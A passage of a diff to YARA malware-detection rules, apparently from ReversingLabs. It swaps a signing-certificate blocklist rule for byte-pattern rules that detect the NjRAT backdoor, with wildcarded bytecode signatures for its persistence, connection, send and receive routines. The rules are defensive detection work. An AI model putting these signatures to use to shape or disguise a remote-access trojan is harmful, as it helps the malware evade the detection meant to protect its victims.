+            3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B
+            ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0
+            5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+        }
+		$read_packet_v1_p2 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ??
+            ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ??
+            06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ??
+            6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ??
+            ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ??
+            73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73
+        }
+		$send_v2 = {
+            7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E
+            B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7
+            6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ??
+            26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ??
+            25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ??
+            28 ?? ?? ?? ?? DC
+        }
+		$open_url_v2 = {
+            03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28
+            ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ??
+            ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ??
+            ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC
+            2B ?? 02 28 ?? ?? ?? ?? 26
+        }
+		$monitoring_v2 = {
+            73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ??
+            11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ??
+            73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ??
+            11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures [ i ] . serial == "6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $read_server_data_v1 ) and ( $send_v1 ) and ( all of ( $read_packet_v1_p* ) ) ) or ( ( $send_v2 ) and ( $open_url_v2 ) and ( $monitoring_v2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NjRAT backdoor."
 		author = "ReversingLabs"
-		id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7"
+		date = "2024-07-31"
+		modified = "2024-07-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L387-L403"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "NjRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$persistence_mechanism_v1_p1 = {
+        00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ??
+        00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A
+        00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16
+        72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ??
+        ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2
+        00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28
+        ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+        DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25
+    }
+		$persistence_mechanism_v1_p2 = {
+        28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00
+        28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ??
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D
+        28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ??
+        ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00
+        7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16
+        15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ??
+        ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ??
+        ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ??
+        11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
+        00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ??
+        11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11
+        ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ??
+        11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11
+        ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28
+    }
+		$connect_v1_p1 = {
+        00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ??
+        11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11
+        ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ??
+        ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28
+        ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ??
+        ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ??
+        ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ??
+        ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ??
+        6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18
+        8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
+        00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+        28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00
+        72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
+        ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+    }
+		$connect_v1_p2 = {
+        00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00
+        11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ??
+        A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ??
+        ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ??
+        ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ??
+        A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11
+        ?? 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ??
+        1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F
+        ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ??
+        ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13
+        ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? ?? ?? ?? 0A 2B ?? 06
+    }
+		$send_v1 = {
+        00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ??
+        ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13
+        ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08
+        8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ??
+        ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE
+        ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ??
+        00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ??
+        ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06
+    }
+		$receive_v1_p1 = {
+        00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ??
+        13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ??
+        13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ??
+        11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ??
+        11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ??
+        ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ??
+        13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ??
+        ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ??
+        ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ??
+        ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15
+        6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C
+        ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ??
+        ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ??
+        ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02)
+    }
+		$receive_v1_p2 = {
+        13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00
+        7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ??
+        ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ??
+        ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ??
+        ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+        11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ??
+        ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ??
+        00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ??
+        ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00
+        16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ??
+        ?? ?? ?? 38 ?? ?? ?? ?? 00
+    }
+		$connect_v2 = {
+        16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ??
+        ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ??
+        26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ??
+        80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20
+        10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ??
+        ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
